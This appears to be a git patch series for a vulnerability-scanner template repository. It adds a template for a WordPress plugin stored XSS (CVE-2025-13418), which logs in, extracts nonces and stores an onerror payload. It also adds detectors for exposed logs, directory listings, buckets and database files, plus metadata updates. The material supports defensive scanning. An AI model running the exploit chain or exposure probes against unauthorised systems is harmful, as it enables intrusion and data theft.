From 43f33d65cc45069f309a66e974d61799f3bd8548 Mon Sep 17 00:00:00 2001 From: Shivam Kamboj <38610159+Sechunt3r@users.noreply.github.com> Date: Fri, 9 Jan 2026 02:54:40 +0530 Subject: [PATCH 01/92] Add CVE-2025-13418 for stored XSS in WordPress plugin Added CVE-2025-13418 YAML file detailing a stored XSS vulnerability in the Responsive Pricing Table plugin for WordPress. Includes information on severity, remediation, and HTTP request flow for exploitation. --- http/cves/2025/CVE-2025-13418.yaml | 176 +++++++++++++++++++++++++++++ 1 file changed, 176 insertions(+) create mode 100644 http/cves/2025/CVE-2025-13418.yaml diff --git a/http/cves/2025/CVE-2025-13418.yaml b/http/cves/2025/CVE-2025-13418.yaml new file mode 100644 index 00000000000..5eaffd415d2 --- /dev/null +++ b/http/cves/2025/CVE-2025-13418.yaml @@ -0,0 +1,176 @@ +id: CVE-2025-13418 + +info: + name: Responsive Pricing Table <= 5.1.12 - Authenticated (Author+) Stored Cross-Site Scripting + author: Shivam Kamboj and Jay Jani + severity: medium + description: | + The Responsive Pricing Table plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'plan_icons' parameter in all versions up to, and including, 5.1.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts that execute when an admin views the pricing table edit page. + remediation: | + Update the Responsive Pricing Table plugin to version 5.1.13 or later. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2025-13418 + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5d28fd23-fa86-4353-b1b4-af61192f8482 + - https://wordpress.org/plugins/dk-pricr-responsive-pricing-table/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2025-13418 + cwe-id: CWE-79 + metadata: + verified: true + max-request: 6 + vendor: wpdarko + product: responsive-pricing-table + framework: wordpress + tags: cve,cve2025,wordpress,wp,xss,responsive-pricing-table,authenticated,stored + +flow: http(1) && http(2) && http(3) && http(4) && http(5) + +http: + - raw: + - | + GET /wp-content/plugins/dk-pricr-responsive-pricing-table/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - "compare_versions(version, '<= 5.1.12')" + - "contains(body, 'Responsive Pricing Table')" + condition: and + internal: true + + extractors: + - type: regex + part: body + name: version + group: 1 + regex: + - 'Stable tag: ([0-9.]+)' + internal: true + + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + matchers: + - type: dsl + dsl: + - status_code == 302 + - contains(header, 'wordpress_logged_in') + condition: and + internal: true + + cookie-reuse: true + + - raw: + - | + GET /wp-admin/post-new.php?post_type=rpt_pricing_table HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "contains(body, 'dmb_rpts_meta_box_nonce')" + condition: and + internal: true + + extractors: + - type: regex + part: body + name: wpnonce + group: 1 + regex: + - 'name="_wpnonce"[^>]*value="([^"]+)"' + internal: true + + - type: regex + part: body + name: dmb_nonce + group: 1 + regex: + - 'name="dmb_rpts_meta_box_nonce"[^>]*value="([^"]+)"' + internal: true + + - type: regex + part: body + name: post_id + group: 1 + regex: + - "id=['\"]post_ID['\"][^>]*value=['\"]([0-9]+)['\"]" + internal: true + + - type: regex + part: body + name: meta_nonce + group: 1 + regex: + - 'name="meta-box-order-nonce"[^>]*value="([^"]+)"' + internal: true + + - type: regex + part: body + name: closed_nonce + group: 1 + regex: + - 'name="closedpostboxesnonce"[^>]*value="([^"]+)"' + internal: true + + - raw: + - | + POST /wp-admin/post.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + _wpnonce={{wpnonce}}&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Drpt_pricing_table&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=rpt_pricing_table&original_post_status=auto-draft&auto_draft=1&post_ID={{post_id}}&meta-box-order-nonce={{meta_nonce}}&closedpostboxesnonce={{closed_nonce}}&post_title=CVE-2025-13418+XSS+Test&hidden_post_status=draft&post_status=publish&visibility=public&publish=Publish&dmb_rpts_meta_box_nonce={{dmb_nonce}}&plan_titles%5B%5D=XSS+Test+Plan&plan_subtitles%5B%5D=&plan_recurrences%5B%5D=&plan_prices%5B%5D=99&plan_descriptions%5B%5D=&plan_features%5B%5D=Feature&plan_button_texts%5B%5D=Buy&plan_button_urls%5B%5D=&plan_custom_buttons%5B%5D=&plan_colors%5B%5D=%238dba09&are_recommended_plans%5B%5D=no&are_removed_currencies%5B%5D=no&plan_custom_classes%5B%5D=&plan_icons%5B%5D=x%27+onerror%3D%27alert%28document.domain%29%27+x%3D%27&table_currency=%24 + + cookie-reuse: true + + matchers: + - type: dsl + dsl: + - "status_code == 302" + - "contains(header, 'message=')" + condition: and + internal: true + + extractors: + - type: regex + part: header + name: created_post_id + group: 1 + regex: + - 'post=([0-9]+)&action=edit' + internal: true + + - raw: + - | + GET /wp-admin/post.php?post={{created_post_id}}&action=edit HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + + matchers-condition: and + matchers: + - type: dsl + dsl: + - status_code == 200 + - contains(body, "onerror='alert(document.domain)'") + - contains(body, "dmb_icon_data_url") + condition: and + + extractors: + - type: regex + part: body + name: xss_payload_stored + group: 1 + regex: + - 'data-icon="([^"]*onerror[^"]*)"' From 70ac97f47348ad9016b36288903b8dd38534e98e Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 16 Jan 2026 10:40:05 +0900 Subject: [PATCH 02/92] Add Polycom HDX web exposure Changed severity level from medium to low for Polycom HDX web exposure. --- .../polycom-hdx-web-exposure.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/exposed-panels/polycom-hdx-web-exposure.yaml diff --git a/http/exposed-panels/polycom-hdx-web-exposure.yaml b/http/exposed-panels/polycom-hdx-web-exposure.yaml new file mode 100644 index 00000000000..452fd48f580 --- /dev/null +++ b/http/exposed-panels/polycom-hdx-web-exposure.yaml @@ -0,0 +1,33 @@ +id: polycom-hdx-web-exposure + +info: + name: Polycom HDX - Web Interface Exposure + author: 0x_Akoko + severity: low + description: | + Detecetd Polycom HDX video conferencing system web interface, potentially allowing unauthorized access to device configuration and video calls. + reference: + - https://www.polycom.com/products-services/hd-telepresence-video-conferencing.html + - https://support.polycom.com/content/support/north-america/usa/en/support/video.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cwe-id: CWE-200 + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Polycom HDX" + fofa-query: title="Polycom" && body="HDX" + tags: polycom,hdx,iot,exposure,video-conferencing + +http: + - method: GET + path: + - "{{BaseURL}}/" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_all(body, "Polycom", "u_keepalive.htm", "u_status.xml", "contentFrame")' + condition: and From 6654042abc4d09291ae12c043e88e3d1bdcf9708 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 16 Jan 2026 11:18:02 +0900 Subject: [PATCH 03/92] Create wordpress-easy-wp-smtp-log-exposure.yaml --- .../wordpress-easy-wp-smtp-log-exposure.yaml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/vulnerabilities/wordpress/wordpress-easy-wp-smtp-log-exposure.yaml diff --git a/http/vulnerabilities/wordpress/wordpress-easy-wp-smtp-log-exposure.yaml b/http/vulnerabilities/wordpress/wordpress-easy-wp-smtp-log-exposure.yaml new file mode 100644 index 00000000000..ea8797491ba --- /dev/null +++ b/http/vulnerabilities/wordpress/wordpress-easy-wp-smtp-log-exposure.yaml @@ -0,0 +1,36 @@ +id: wordpress-easy-wp-smtp-log-exposure + +info: + name: WordPress Easy WP SMTP - Log Exposure + author: 0x_Akoko + severity: medium + description: | + Detected WordPress Easy WP SMTP plugin debug log file exposed via directory listing, potentially revealing sensitive email contents including password reset links. + reference: + - https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35234 + - https://wpscan.com/vulnerability/10494 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-35234 + cwe-id: CWE-532 + metadata: + verified: true + max-request: 2 + tags: wp,wordpress,wp-plugin,easy-wp-smtp,exposure,logs + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/" + - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/logs/" + + stop-at-first-match: true + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_all(body, "Index of", "Parent Directory", "easy-wp-smtp", ".txt")' + condition: and From e1e6e6f3d89f4019bdc46d7476172353efe0db50 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 16 Jan 2026 11:27:04 +0900 Subject: [PATCH 04/92] Create adobe-coldfusion-dir-listing.yaml --- .../adobe/adobe-coldfusion-dir-listing.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/misconfiguration/adobe/adobe-coldfusion-dir-listing.yaml diff --git a/http/misconfiguration/adobe/adobe-coldfusion-dir-listing.yaml b/http/misconfiguration/adobe/adobe-coldfusion-dir-listing.yaml new file mode 100644 index 00000000000..b540c6abf1c --- /dev/null +++ b/http/misconfiguration/adobe/adobe-coldfusion-dir-listing.yaml @@ -0,0 +1,34 @@ +id: adobe-coldfusion-dir-listing + +info: + name: Adobe ColdFusion - CFIDE Directory Listing + author: 0x_Akoko + severity: medium + description: | + Detected Adobe ColdFusion CFIDE directory listing was exposed. This can reveal sensitive files and subdirectories including administrator interfaces, scripts, and application components. + reference: + - https://helpx.adobe.com/coldfusion/kb/securing-coldfusion.html + - https://www.carnal0wnage.com/papers/LARES-ColdFusion.pdf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-548 + metadata: + max-request: 1 + verified: true + shodan-query: http.title:"Index of" http.html:"CFIDE" + fofa-query: title="Index of" && body="CFIDE" + tags: misconfig,coldfusion,adobe,exposure,listing + +http: + - method: GET + path: + - "{{BaseURL}}/CFIDE/" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_all(body, "Index of", "CFIDE")' + - 'contains_any(body, "administrator", "scripts", "componentutils", "wizards", "adminapi")' + condition: and From 160218544ccd62869b329382495824f592c314f2 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 16 Jan 2026 13:24:38 +0900 Subject: [PATCH 05/92] Add IBM Cloud Object Storage bucket exposure check This YAML file defines a misconfiguration check for IBM Cloud Object Storage, identifying publicly accessible buckets that may expose sensitive data. --- .../ibm/ibm-cloud-bucket-exposure.yaml | 47 +++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 http/misconfiguration/ibm/ibm-cloud-bucket-exposure.yaml diff --git a/http/misconfiguration/ibm/ibm-cloud-bucket-exposure.yaml b/http/misconfiguration/ibm/ibm-cloud-bucket-exposure.yaml new file mode 100644 index 00000000000..3482e9e3fcb --- /dev/null +++ b/http/misconfiguration/ibm/ibm-cloud-bucket-exposure.yaml @@ -0,0 +1,47 @@ +id: ibm-cloud-bucket-exposure + +info: + name: IBM Cloud Object Storage - Bucket Exposure + author: 0x_Akoko + severity: unknown + description: | + IBM Cloud Object Storage bucket is publicly accessible, potentially exposing + sensitive files and data. Public bucket listing allows enumeration of stored objects. + reference: + - https://cloud.ibm.com/docs/cloud-object-storage + - https://cloud.ibm.com/docs/cloud-object-storage?topic=cloud-object-storage-iam-bucket-permissions + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-284 + metadata: + verified: true + max-request: 2 + shodan-query: ssl.cert.subject.cn:"cloud-object-storage.appdomain.cloud" + fofa-query: host="cloud-object-storage.appdomain.cloud" + tags: ibm,cloud,bucket,exposure,misconfig,s3 + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/?list-type=2" + + stop-at-first-match: true + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_all(body, "")' + - 'contains_any(tolower(header), "ibm-sse-kp-enabled", "ibm-sse-kp-customer-root-key-crn", "ibm-")' + - 'contains_any(tolower(content_type), "application/xml", "text/xml")' + condition: and + + extractors: + - type: regex + name: bucket-name + part: body + regex: + - "([^<]+)" + group: 1 From 08d1aa9a2b17112d4b1f7e0503d598af35caf129 Mon Sep 17 00:00:00 2001 From: Ezzer17 Date: Fri, 16 Jan 2026 01:00:12 +0300 Subject: [PATCH 06/92] Fix typo in tags of CVE-2024-43425 --- http/cves/2024/CVE-2024-43425.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-43425.yaml b/http/cves/2024/CVE-2024-43425.yaml index 8b011a6a343..5f2b88126d8 100644 --- a/http/cves/2024/CVE-2024-43425.yaml +++ b/http/cves/2024/CVE-2024-43425.yaml @@ -27,7 +27,7 @@ info: shodan-query: title:"Moodle" product: moodle vendor: moodle - tags: cve,cve2024,moodile,rce,authenticated,vuln + tags: cve,cve2024,moodle,rce,authenticated,vuln flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6) From 44639a866d6be9427160952ee80f3872285d9788 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Mon, 19 Jan 2026 08:55:53 +0900 Subject: [PATCH 07/92] Create zen-cart-log-exposure.yaml --- .../exposures/logs/zen-cart-log-exposure.yaml | 50 +++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 http/exposures/logs/zen-cart-log-exposure.yaml diff --git a/http/exposures/logs/zen-cart-log-exposure.yaml b/http/exposures/logs/zen-cart-log-exposure.yaml new file mode 100644 index 00000000000..2f766689a57 --- /dev/null +++ b/http/exposures/logs/zen-cart-log-exposure.yaml @@ -0,0 +1,50 @@ +id: zen-cart-log-exposure + +info: + name: Zen Cart Log File Exposure + author: 0x_Akoko + severity: medium + description: | + Detected exposed Zen Cart log files that may contain sensitive information including error messages, file paths, database queries, and customer data. + reference: + - https://www.zen-cart.com/ + - https://docs.zen-cart.com/user/troubleshooting/debug_logs/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + metadata: + max-request: 5 + shodan-query: http.html:"zen-cart" || http.html:"Zen Cart" + fofa-query: body="zen-cart" || body="Zen Cart" + tags: zencart,exposure,logs,ecommerce + +http: + - method: GET + path: + - "{{BaseURL}}/logs/" + - "{{BaseURL}}/cache/" + - "{{BaseURL}}/includes/logs/" + - "{{BaseURL}}/admin/logs/" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Index of" + - "myDEBUG" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + name: log-files + part: body + regex: + - 'myDEBUG[a-zA-Z0-9_-]+\.log' From 4af1944c7bb354df412906d0677cfe5cddcc46b6 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Mon, 19 Jan 2026 10:42:44 +0900 Subject: [PATCH 08/92] Add jakefile-disclosure.yaml for exposure detection Added a configuration file for detecting exposed Jakefile build configurations that may contain sensitive information. --- .../configs/jakefile-disclosure.yaml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/exposures/configs/jakefile-disclosure.yaml diff --git a/http/exposures/configs/jakefile-disclosure.yaml b/http/exposures/configs/jakefile-disclosure.yaml new file mode 100644 index 00000000000..49a3a898b1d --- /dev/null +++ b/http/exposures/configs/jakefile-disclosure.yaml @@ -0,0 +1,35 @@ +id: jakefile-disclosure + +info: + name: Jakefile Build Configuration - Disclosure + author: 0x_Akoko + severity: info + description: | + Detected Jakefile build configuration was found to be exposed, potentially having contained sensitive information including database credentials, API keys, and server configurations. + reference: + - https://jakejs.com/ + - https://github.com/jakejs/jake + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + metadata: + verified: true + max-request: 2 + shodan-query: html:"Jakefile" + tags: exposure,devops,jakefile,nodejs,config + +http: + - method: GET + path: + - "{{BaseURL}}/Jakefile" + - "{{BaseURL}}/Jakefile.js" + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - '!contains_any(body, " Date: Mon, 19 Jan 2026 11:06:20 +0900 Subject: [PATCH 09/92] Add kanboard-database-exposure.yaml Added a new YAML file to detect Kanboard SQLite database exposure. --- .../kanboard-database-exposure.yaml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/misconfiguration/kanboard-database-exposure.yaml diff --git a/http/misconfiguration/kanboard-database-exposure.yaml b/http/misconfiguration/kanboard-database-exposure.yaml new file mode 100644 index 00000000000..8da5f853a9c --- /dev/null +++ b/http/misconfiguration/kanboard-database-exposure.yaml @@ -0,0 +1,35 @@ +id: kanboard-database-exposure + +info: + name: Kanboard - SQLite Database Exposure + author: 0x_Akoko + severity: high + description: | + Detected Kanboard SQLite database file was found to be exposed, containing sensitive information including user credentials, project data, tasks, and comments. + reference: + - https://docs.kanboard.org/v1/admin/sqlite/ + - https://kanboard.org/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-200 + metadata: + verified: true + max-request: 2 + shodan-query: http.title:"Kanboard" + fofa-query: title="Kanboard" + tags: kanboard,exposure,database,sqlite,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/data/db.sqlite" + - "{{BaseURL}}/kanboard/data/db.sqlite" + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_all(body, "SQLite format 3", "CREATE TABLE", "INTEGER PRIMARY KEY")' + condition: and From 17e36fdbe3f0a7e3d9d39a2b1a79eebb3b178238 Mon Sep 17 00:00:00 2001 From: ghost Date: Mon, 19 Jan 2026 02:43:03 +0000 Subject: [PATCH 10/92] =?UTF-8?q?chore:=20update=20EPSS=20scores=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- code/cves/2014/CVE-2014-0160.yaml | 2 +- code/cves/2019/CVE-2019-0604.yaml | 2 +- code/cves/2019/CVE-2019-14287.yaml | 2 +- code/cves/2021/CVE-2021-3156.yaml | 4 ++-- code/cves/2022/CVE-2022-42475.yaml | 4 ++-- code/cves/2023/CVE-2023-2640.yaml | 4 ++-- code/cves/2023/CVE-2023-6246.yaml | 2 +- code/cves/2024/CVE-2024-22120.yaml | 2 +- code/cves/2024/CVE-2024-55556.yaml | 2 +- code/cves/2024/CVE-2024-56331.yaml | 2 +- code/cves/2024/CVE-2024-9487.yaml | 2 +- code/cves/2025/CVE-2025-1550.yaml | 2 +- code/cves/2025/CVE-2025-22457.yaml | 4 ++-- code/cves/2025/CVE-2025-25291.yaml | 2 +- code/cves/2025/CVE-2025-32433.yaml | 4 ++-- code/cves/2025/CVE-2025-54309.yaml | 4 ++-- code/cves/2025/CVE-2025-68926.yaml | 4 ++-- dast/cves/2020/CVE-2020-9402.yaml | 4 ++-- dast/cves/2021/CVE-2021-35042.yaml | 4 ++-- dast/cves/2022/CVE-2022-22965.yaml | 4 ++-- dast/cves/2022/CVE-2022-42889.yaml | 4 ++-- headless/cves/2018/CVE-2018-25031.yaml | 2 +- headless/cves/2022/CVE-2022-29455-headless.yaml | 2 +- headless/cves/2024/CVE-2024-29882.yaml | 4 ++-- headless/cves/2024/CVE-2024-38526.yaml | 2 +- headless/cves/2025/CVE-2025-29927-HEADLESS.yaml | 2 +- headless/cves/2025/CVE-2025-8191.yaml | 4 ++-- http/cves/2000/CVE-2000-0114.yaml | 2 +- http/cves/2000/CVE-2000-0760.yaml | 2 +- http/cves/2002/CVE-2002-1131.yaml | 4 ++-- http/cves/2004/CVE-2004-0519.yaml | 2 +- http/cves/2004/CVE-2004-1965.yaml | 2 +- http/cves/2005/CVE-2005-2428.yaml | 2 +- http/cves/2005/CVE-2005-3128.yaml | 2 +- http/cves/2005/CVE-2005-3344.yaml | 2 +- http/cves/2005/CVE-2005-3634.yaml | 2 +- http/cves/2005/CVE-2005-4385.yaml | 4 ++-- http/cves/2006/CVE-2006-1681.yaml | 2 +- http/cves/2006/CVE-2006-2842.yaml | 2 +- http/cves/2006/CVE-2006-3392.yaml | 4 ++-- http/cves/2007/CVE-2007-0885.yaml | 4 ++-- http/cves/2007/CVE-2007-2449.yaml | 4 ++-- http/cves/2007/CVE-2007-3010.yaml | 2 +- http/cves/2007/CVE-2007-4504.yaml | 2 +- http/cves/2007/CVE-2007-4556.yaml | 2 +- http/cves/2007/CVE-2007-5728.yaml | 2 +- http/cves/2008/CVE-2008-1059.yaml | 2 +- http/cves/2008/CVE-2008-1061.yaml | 2 +- http/cves/2008/CVE-2008-2398.yaml | 2 +- http/cves/2008/CVE-2008-2650.yaml | 2 +- http/cves/2008/CVE-2008-4668.yaml | 2 +- http/cves/2008/CVE-2008-4764.yaml | 2 +- http/cves/2008/CVE-2008-5587.yaml | 2 +- http/cves/2008/CVE-2008-6172.yaml | 2 +- http/cves/2008/CVE-2008-6222.yaml | 2 +- http/cves/2008/CVE-2008-6465.yaml | 2 +- http/cves/2008/CVE-2008-6668.yaml | 2 +- http/cves/2008/CVE-2008-6982.yaml | 2 +- http/cves/2008/CVE-2008-7269.yaml | 2 +- http/cves/2009/CVE-2009-0545.yaml | 2 +- http/cves/2009/CVE-2009-1496.yaml | 2 +- http/cves/2009/CVE-2009-1558.yaml | 2 +- http/cves/2009/CVE-2009-1872.yaml | 2 +- http/cves/2009/CVE-2009-2015.yaml | 2 +- http/cves/2009/CVE-2009-2100.yaml | 2 +- http/cves/2009/CVE-2009-3053.yaml | 2 +- http/cves/2009/CVE-2009-3318.yaml | 2 +- http/cves/2009/CVE-2009-4202.yaml | 2 +- http/cves/2009/CVE-2009-4223.yaml | 2 +- http/cves/2009/CVE-2009-4679.yaml | 2 +- http/cves/2009/CVE-2009-5020.yaml | 2 +- http/cves/2009/CVE-2009-5114.yaml | 2 +- http/cves/2010/CVE-2010-0696.yaml | 2 +- http/cves/2010/CVE-2010-0759.yaml | 2 +- http/cves/2010/CVE-2010-0942.yaml | 2 +- http/cves/2010/CVE-2010-0943.yaml | 2 +- http/cves/2010/CVE-2010-0944.yaml | 2 +- http/cves/2010/CVE-2010-0972.yaml | 2 +- http/cves/2010/CVE-2010-0982.yaml | 2 +- http/cves/2010/CVE-2010-0985.yaml | 2 +- http/cves/2010/CVE-2010-1056.yaml | 2 +- http/cves/2010/CVE-2010-1217.yaml | 2 +- http/cves/2010/CVE-2010-1219.yaml | 2 +- http/cves/2010/CVE-2010-1302.yaml | 2 +- http/cves/2010/CVE-2010-1304.yaml | 2 +- http/cves/2010/CVE-2010-1306.yaml | 2 +- http/cves/2010/CVE-2010-1307.yaml | 2 +- http/cves/2010/CVE-2010-1308.yaml | 2 +- http/cves/2010/CVE-2010-1312.yaml | 2 +- http/cves/2010/CVE-2010-1313.yaml | 2 +- http/cves/2010/CVE-2010-1314.yaml | 2 +- http/cves/2010/CVE-2010-1315.yaml | 2 +- http/cves/2010/CVE-2010-1340.yaml | 2 +- http/cves/2010/CVE-2010-1353.yaml | 2 +- http/cves/2010/CVE-2010-1429.yaml | 2 +- http/cves/2010/CVE-2010-1461.yaml | 4 ++-- http/cves/2010/CVE-2010-1469.yaml | 2 +- http/cves/2010/CVE-2010-1471.yaml | 2 +- http/cves/2010/CVE-2010-1474.yaml | 2 +- http/cves/2010/CVE-2010-1475.yaml | 2 +- http/cves/2010/CVE-2010-1476.yaml | 2 +- http/cves/2010/CVE-2010-1478.yaml | 2 +- http/cves/2010/CVE-2010-1495.yaml | 2 +- http/cves/2010/CVE-2010-1532.yaml | 4 ++-- http/cves/2010/CVE-2010-1533.yaml | 2 +- http/cves/2010/CVE-2010-1535.yaml | 2 +- http/cves/2010/CVE-2010-1540.yaml | 2 +- http/cves/2010/CVE-2010-1586.yaml | 2 +- http/cves/2010/CVE-2010-1601.yaml | 2 +- http/cves/2010/CVE-2010-1602.yaml | 2 +- http/cves/2010/CVE-2010-1603.yaml | 2 +- http/cves/2010/CVE-2010-1607.yaml | 2 +- http/cves/2010/CVE-2010-1657.yaml | 2 +- http/cves/2010/CVE-2010-1659.yaml | 2 +- http/cves/2010/CVE-2010-1714.yaml | 2 +- http/cves/2010/CVE-2010-1715.yaml | 2 +- http/cves/2010/CVE-2010-1717.yaml | 2 +- http/cves/2010/CVE-2010-1718.yaml | 2 +- http/cves/2010/CVE-2010-1719.yaml | 2 +- http/cves/2010/CVE-2010-1722.yaml | 2 +- http/cves/2010/CVE-2010-1723.yaml | 2 +- http/cves/2010/CVE-2010-1870.yaml | 2 +- http/cves/2010/CVE-2010-1875.yaml | 2 +- http/cves/2010/CVE-2010-1878.yaml | 2 +- http/cves/2010/CVE-2010-1952.yaml | 2 +- http/cves/2010/CVE-2010-1954.yaml | 2 +- http/cves/2010/CVE-2010-1955.yaml | 2 +- http/cves/2010/CVE-2010-1956.yaml | 2 +- http/cves/2010/CVE-2010-1957.yaml | 2 +- http/cves/2010/CVE-2010-1977.yaml | 2 +- http/cves/2010/CVE-2010-1979.yaml | 2 +- http/cves/2010/CVE-2010-1981.yaml | 2 +- http/cves/2010/CVE-2010-1983.yaml | 2 +- http/cves/2010/CVE-2010-2018.yaml | 2 +- http/cves/2010/CVE-2010-2033.yaml | 2 +- http/cves/2010/CVE-2010-2034.yaml | 2 +- http/cves/2010/CVE-2010-2035.yaml | 4 ++-- http/cves/2010/CVE-2010-2036.yaml | 2 +- http/cves/2010/CVE-2010-2037.yaml | 2 +- http/cves/2010/CVE-2010-2045.yaml | 2 +- http/cves/2010/CVE-2010-2050.yaml | 2 +- http/cves/2010/CVE-2010-2122.yaml | 2 +- http/cves/2010/CVE-2010-2259.yaml | 2 +- http/cves/2010/CVE-2010-2307.yaml | 2 +- http/cves/2010/CVE-2010-2507.yaml | 2 +- http/cves/2010/CVE-2010-2680.yaml | 2 +- http/cves/2010/CVE-2010-2682.yaml | 2 +- http/cves/2010/CVE-2010-2857.yaml | 2 +- http/cves/2010/CVE-2010-2861.yaml | 2 +- http/cves/2010/CVE-2010-2918.yaml | 2 +- http/cves/2010/CVE-2010-3203.yaml | 4 ++-- http/cves/2010/CVE-2010-3426.yaml | 2 +- http/cves/2010/CVE-2010-4231.yaml | 2 +- http/cves/2010/CVE-2010-4239.yaml | 2 +- http/cves/2010/CVE-2010-4617.yaml | 2 +- http/cves/2010/CVE-2010-4719.yaml | 2 +- http/cves/2010/CVE-2010-4977.yaml | 2 +- http/cves/2010/CVE-2010-5028.yaml | 2 +- http/cves/2011/CVE-2011-0049.yaml | 2 +- http/cves/2011/CVE-2011-1669.yaml | 2 +- http/cves/2011/CVE-2011-2744.yaml | 2 +- http/cves/2011/CVE-2011-3600.yaml | 4 ++-- http/cves/2011/CVE-2011-4336.yaml | 2 +- http/cves/2011/CVE-2011-4618.yaml | 2 +- http/cves/2011/CVE-2011-4624.yaml | 2 +- http/cves/2011/CVE-2011-4640.yaml | 2 +- http/cves/2011/CVE-2011-4804.yaml | 4 ++-- http/cves/2011/CVE-2011-4926.yaml | 2 +- http/cves/2011/CVE-2011-5106.yaml | 2 +- http/cves/2011/CVE-2011-5107.yaml | 2 +- http/cves/2011/CVE-2011-5179.yaml | 2 +- http/cves/2011/CVE-2011-5181.yaml | 2 +- http/cves/2011/CVE-2011-5252.yaml | 2 +- http/cves/2012/CVE-2012-0896.yaml | 2 +- http/cves/2012/CVE-2012-0901.yaml | 2 +- http/cves/2012/CVE-2012-0981.yaml | 4 ++-- http/cves/2012/CVE-2012-0991.yaml | 4 ++-- http/cves/2012/CVE-2012-0996.yaml | 4 ++-- http/cves/2012/CVE-2012-10018.yaml | 4 ++-- http/cves/2012/CVE-2012-1226.yaml | 4 ++-- http/cves/2012/CVE-2012-1823.yaml | 2 +- http/cves/2012/CVE-2012-1835.yaml | 2 +- http/cves/2012/CVE-2012-4032.yaml | 2 +- http/cves/2012/CVE-2012-4242.yaml | 2 +- http/cves/2012/CVE-2012-4273.yaml | 2 +- http/cves/2012/CVE-2012-4547.yaml | 2 +- http/cves/2012/CVE-2012-4768.yaml | 2 +- http/cves/2012/CVE-2012-4878.yaml | 2 +- http/cves/2012/CVE-2012-4889.yaml | 2 +- http/cves/2012/CVE-2012-4982.yaml | 2 +- http/cves/2012/CVE-2012-5321.yaml | 2 +- http/cves/2012/CVE-2012-5913.yaml | 2 +- http/cves/2012/CVE-2012-6499.yaml | 2 +- http/cves/2013/CVE-2013-1965.yaml | 2 +- http/cves/2013/CVE-2013-2287.yaml | 2 +- http/cves/2013/CVE-2013-2621.yaml | 2 +- http/cves/2013/CVE-2013-3526.yaml | 2 +- http/cves/2013/CVE-2013-3827.yaml | 2 +- 